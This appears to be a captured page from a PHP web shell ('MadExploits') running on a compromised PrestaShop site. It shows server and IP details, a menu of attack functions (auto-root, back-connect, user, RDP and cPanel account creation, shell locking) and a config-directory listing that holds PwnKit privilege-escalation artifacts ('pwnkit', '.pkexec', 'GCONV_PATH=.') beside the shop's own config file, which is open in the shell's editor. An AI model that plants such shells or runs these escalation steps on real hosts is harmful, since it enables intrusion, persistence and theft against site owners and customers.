Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.124
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
garmin /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
services
[ DIR ]
drwx---r-x
themes
[ DIR ]
drwx---r-x
xml
[ DIR ]
drwx---r-x
.htaccess
170
B
-rw----r--
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
alias.php
2.01
KB
-rw----r--
autoload.php
1.31
KB
-rw----r--
bootstrap.php
6.03
KB
-rw----r--
config.inc.php
9.91
KB
-rw----r--
db_slave_server.inc.php
1.31
KB
-rw----r--
defines.inc.php
7.22
KB
-rw----r--
defines_uri.inc.php
3.09
KB
-rw----r--
index.php
1.34
KB
-rw----r--
pwnkit
10.99
KB
-rwxr-xr-x
settings.inc.php
23
B
-rw----r--
smarty.config.inc.php
6.61
KB
-rw----r--
smartyadmin.config.inc.php
5.79
KB
-rw----r--
smartyfront.config.inc.php
8.59
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : smartyadmin.config.inc.php
<?php /** * Copyright since 2007 PrestaShop SA and Contributors * PrestaShop is an International Registered Trademark & Property of PrestaShop SA * * NOTICE OF LICENSE * * This source file is subject to the Open Software License (OSL 3.0) * that is bundled with this package in the file LICENSE.md. * It is also available through the world-wide-web at this URL: * https://opensource.org/licenses/OSL-3.0 * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@prestashop.com so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade PrestaShop to newer * versions in the future. If you wish to customize PrestaShop for your * needs please refer to https://devdocs.prestashop.com/ for more information. * * @author PrestaShop SA and Contributors <contact@prestashop.com> * @copyright Since 2007 PrestaShop SA and Contributors * @license https://opensource.org/licenses/OSL-3.0 Open Software License (OSL 3.0) */ global $smarty; $smarty->debugging = false; $smarty->debugging_ctrl = 'NONE'; // Let user choose to force compilation $smarty->force_compile = (Configuration::get('PS_SMARTY_FORCE_COMPILE') == _PS_SMARTY_FORCE_COMPILE_) ? true : false; // But force compile_check since the performance impact is small and it is better for debugging $smarty->compile_check = true; smartyRegisterFunction($smarty, 'function', 'toolsConvertPrice', 'toolsConvertPrice'); smartyRegisterFunction($smarty, 'function', 'convertPrice', array('Product', 'convertPrice')); smartyRegisterFunction($smarty, 'function', 'convertPriceWithCurrency', array('Product', 'convertPriceWithCurrency')); smartyRegisterFunction($smarty, 'function', 'displayWtPrice', array('Product', 'displayWtPrice')); smartyRegisterFunction($smarty, 'function', 'displayWtPriceWithCurrency', array('Product', 'displayWtPriceWithCurrency')); smartyRegisterFunction($smarty, 'function', 'displayPrice', array('Tools', 'displayPriceSmarty')); smartyRegisterFunction($smarty, 'modifier', 'convertAndFormatPrice', array('Product', 'convertAndFormatPrice')); // used twice smartyRegisterFunction($smarty, 'function', 'getAdminToken', array('Tools', 'getAdminTokenLiteSmarty')); smartyRegisterFunction($smarty, 'function', 'displayAddressDetail', array('AddressFormat', 'generateAddressSmarty')); smartyRegisterFunction($smarty, 'function', 'getWidthSize', array('Image', 'getWidth')); smartyRegisterFunction($smarty, 'function', 'getHeightSize', array('Image', 'getHeight')); smartyRegisterFunction($smarty, 'function', 'addJsDef', array('Media', 'addJsDef')); smartyRegisterFunction($smarty, 'block', 'addJsDefL', array('Media', 'addJsDefL')); smartyRegisterFunction($smarty, 'modifier', 'secureReferrer', array('Tools', 'secureReferrer')); $module_resources['modules'] = _PS_MODULE_DIR_; $smarty->registerResource('module', new SmartyResourceModule($module_resources, $isAdmin = true)); function toolsConvertPrice($params, &$smarty) { return Tools::convertPrice($params['price'], Context::getContext()->currency); } function smartyTranslate($params, $smarty) { $translator = Context::getContext()->getTranslator(); $htmlEntities = !isset($params['html']) && !isset($params['js']); $addSlashes = (isset($params['slashes']) || isset($params['js'])); $isInPDF = isset($params['pdf']); $isInModule = !empty($params['mod']); $sprintf = array(); if (isset($params['sprintf']) && !is_array($params['sprintf'])) { $sprintf = array($params['sprintf']); } elseif (isset($params['sprintf'])) { $sprintf = $params['sprintf']; } if (($htmlEntities || $addSlashes)) { $sprintf['legacy'] = $htmlEntities ? 'htmlspecialchars': 'addslashes'; } if (!empty($params['d'])) { if (isset($params['tags'])) { $backTrace = debug_backtrace(); $errorMessage = sprintf( 'Unable to translate "%s" in %s. tags() is not supported anymore, please use sprintf().', $params['s'], $backTrace[0]['args'][1]->template_resource ); if (_PS_MODE_DEV_) { throw new Exception($errorMessage); } else { PrestaShopLogger::addLog($errorMessage); } } if (!is_array($sprintf)) { $backTrace = debug_backtrace(); $errorMessage = sprintf( 'Unable to translate "%s" in %s. sprintf() parameter should be an array.', $params['s'], $backTrace[0]['args'][1]->template_resource ); if (_PS_MODE_DEV_) { throw new Exception($errorMessage); } else { PrestaShopLogger::addLog($errorMessage); return $params['s']; } } return $translator->trans($params['s'], $sprintf, $params['d']); } if ($isInPDF) { return Translate::smartyPostProcessTranslation( Translate::getPdfTranslation( $params['s'], $sprintf ), $params ); } // If the template is part of a module if ($isInModule) { return Translate::smartyPostProcessTranslation( Translate::getModuleTranslation( $params['mod'], $params['s'], basename($smarty->source->name, '.tpl'), $sprintf, isset($params['js']) ), $params ); } $translatedValue = $translator->trans($params['s'], $sprintf, null); if ($htmlEntities) { $translatedValue = htmlspecialchars($translatedValue, ENT_COMPAT, 'UTF-8'); } if ($addSlashes) { $translatedValue = addslashes($translatedValue); } return $translatedValue; }
Close